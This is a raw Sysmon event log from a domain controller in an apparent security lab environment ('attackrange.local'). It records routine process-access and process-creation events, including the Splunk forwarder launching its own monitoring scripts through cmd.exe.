13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002476Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002475Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-7100-000000009101}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002474Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.539{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-7100-000000009101}3864C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002473Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.541{10ACEC4A-8556-5FCF-7100-000000009101}3864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002472Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-7000-000000009101}3800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002471Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002470Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002469Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002468Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002467Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002466Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002465Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002464Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002463Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002462Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-8556-5FCF-7000-000000009101}3800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002461Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.430{10ACEC4A-8551-5FCF-3300-000000009101}30803836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-8556-5FCF-7000-000000009101}3800C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002460Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.432{10ACEC4A-8556-5FCF-7000-000000009101}3800C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002459Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8556-5FCF-6F00-000000009101}3956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:26.320{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 